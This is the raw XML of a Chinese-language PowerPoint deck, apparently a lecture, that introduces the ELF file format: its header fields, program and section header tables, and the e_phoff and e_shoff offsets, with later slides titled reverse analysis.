            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序头部表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Program Header Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果存在的话，会告诉系统如何创建进程映像。用来构造进程映像的目标文件必须具有程序头部表，可重定位文件不需要这个表。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>节区头部表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Section Header Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包含了描述文件节区的信息，每个节区在表中都有一项，每一项给出诸如节区名称、节区大小这类信息。用于链接的目标文件必须包含节区头部表，其他目标文件可以有，也可以没有这个表。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尽管图中显示的各个组成部分都是有顺序的，实际上除了头部表外，其他的节区和段都没有规定顺序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="1165860"/>
            <a:ext cx="3929380" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="1743710"/>
            <a:ext cx="4050030" cy="2164080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="3907790"/>
            <a:ext cx="4050665" cy="2177415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6683375" y="2007235"/>
            <a:ext cx="4199255" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标文件标识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>体系结构类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标文件版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序入口虚拟地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序头部表格的偏移量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>节区头部表格的偏移量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件中与特定处理器相关的标志</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部的大小</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序头部表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的表项大小</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序头部表的表项数目</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>节区头部表的表项大小</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>节区头部表的表项数目</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6018530" y="1612265"/>
            <a:ext cx="6174105" cy="3721735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6350" y="1612265"/>
            <a:ext cx="6024245" cy="37592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E491E42-D657-49D1-8EB6-0CACAB33E671}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302659" y="337015"/>
            <a:ext cx="5697748" cy="682623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268730" y="1165860"/>
            <a:ext cx="8355330" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>e_phoff 的作用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>e_phoff加上文件的头地址就可以定位到程序头表的位置</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>e_shoff的作用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>e_shoff加上文件的头地址就可以定位到节头表的位置</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374775" y="2878455"/>
            <a:ext cx="3004820" cy="2437130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927600" y="2878455"/>
            <a:ext cx="2854960" cy="2368550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>
</p:sld>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7771</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>432</Paragraphs>
  <Slides>35</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vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman Regular</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>方正姚体</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>ELF文件介绍</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>总结</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天波</dc:creator>
  <cp:lastModifiedBy>从前慢。</cp:lastModifiedBy>
  <cp:revision>304</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-24T08:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-03T09:58:03Z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